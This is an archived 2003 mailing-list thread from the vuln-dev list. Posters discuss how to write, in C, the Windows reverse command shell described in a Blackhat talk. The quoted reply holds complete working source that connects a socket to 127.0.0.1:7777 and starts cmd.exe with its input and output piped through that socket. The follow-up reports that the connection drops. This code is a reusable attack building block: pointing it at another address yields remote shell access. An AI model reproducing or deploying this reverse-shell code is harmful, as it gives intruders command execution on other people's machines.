Hello 3APA3A,

Thanks for your code. The one I wrote is absolutely the same, without bind. In fact we don't need "bind", though David Litchfield mentions it in his Blackhat talk. So anyway, did you try compiling your code? If not, you should try, because I see the same results, i.e. I get a connection on my netcat, but then it suddenly disconnects. No command prompt.

Tuesday, February 4, 2003, 10:34:56 PM, you wrote:

3> Return-Path: <3APA3Aat_private>
3> X-Sieve: cmu-sieve 2.0
3> Received: from woland.freenet.kg (woland.freenet.kg [212.112.99.34])
3>   by mail.hotmail.kg (Hotmail.KG edition/Version 1.0) with ESMTP id h14GVEb17456
3>   for <netninjaat_private>; Tue, 4 Feb 2003 21:31:14 +0500 (KGT)
3> Received: from adm.sci-nnov.ru (adm.sci-nnov.ru [195.122.226.2])
3>   by woland.freenet.kg (8.12.6/8.12.6) with ESMTP id h14HtUoc013643
3>   for <netninjaat_private>; Tue, 4 Feb 2003 22:55:39 +0500
3> Received: from anonymous.sandy.ru (anonymous.sandy.ru. [195.122.226.40])
3>   by adm.sci-nnov.ru (8.11.6/8.11.6) with ESMTP id h14GYuu38518;
3>   Tue, 4 Feb 2003 19:34:56 +0300 (MSK)
3>   (envelope-from 3APA3Aat_private)
3> Date: Tue, 4 Feb 2003 19:34:56 +0300
3> From: 3APA3A <3APA3Aat_private>
3> X-Mailer: The Bat! (v1.61)
3> Reply-To: 3APA3A <3APA3Aat_private>
3> Organization: http://www.security.nnov.ru
3> X-Priority: 3 (Normal)
3> Message-ID: <1939904491.20030204193456at_private>
3> To: SecFocus <netninjaat_private>
3> CC: vuln-devat_private
3> Subject: Re: Windows reverse Shell
3> In-Reply-To: <1028124981.20030204013745at_private>
3> References: <1028124981.20030204013745at_private>
3> MIME-Version: 1.0
3> Content-Type: text/plain; charset=Windows-1251
3> Content-Transfer-Encoding: 8bit
3>
3> Dear NetNinja,
3>
3> The code below successfully brings a reverse shell to 127.0.0.1:7777.
3> #include <windows.h>
3> #include <winsock2.h>
3> #include <stdio.h>
3>
3> int main(int argc, char* argv[]){
3>   WSADATA wd;
3>   HANDLE h;
3>   SOCKET sock;
3>   STARTUPINFO si;
3>   PROCESS_INFORMATION pi;
3>   struct sockaddr_in sin;
3>   int size = sizeof(sin);
3>
3>   memset(&sin, 0, sizeof(sin));
3>   memset(&si, 0, sizeof(si));
3>   WSAStartup(MAKEWORD( 1, 1 ), &wd);
3>   sock=WSASocket(PF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);
3>   sin.sin_family = AF_INET;
3>   bind(sock, (struct sockaddr*)&sin, size);
3>   sin.sin_port = htons(7777);
3>   sin.sin_addr.s_addr = inet_addr("127.0.0.1");
3>   connect(sock, (struct sockaddr*)&sin, size);
3>   si.cb = sizeof(si);
3>   si.dwFlags = STARTF_USESTDHANDLES;
3>   si.hStdInput = si.hStdOutput = si.hStdError = sock;
3>   CreateProcess(
3>     NULL,
3>     "cmd.exe",
3>     NULL,
3>     NULL,
3>     TRUE,
3>     0,
3>     0,
3>     NULL,
3>     &si,
3>     &pi
3>   );
3>   return 0;
3> }
3>
3> --
3> Monday, February 3, 2003, 10:37:45 PM, you wrote to vuln-devat_private:
3>
N>> Hello guys,
N>>
N>> David Litchfield in his Blackhat talk talked about using the socket handle
N>> from WSASocket() and passing that handle as a parameter to stdin, stdout
N>> and stderr for the CreateProcess function. By doing it this way his reverse
N>> cmd shellcode becomes much smaller. I tried coding that reverse
N>> command shell in C, but couldn't get it to work. It simply connects to
N>> my listening netcat listener and then disconnects. David Litchfield
N>> used 4 functions to achieve that: WSASocket, bind, connect and
N>> CreateProcess. A little help would be appreciated on building this reverse
N>> cmd shell. Thanks.

--
Best regards,
Adik                            mailto:netninjaat_private
This archive was generated by hypermail 2b30 : Wed Feb 05 2003 - 09:22:27 PST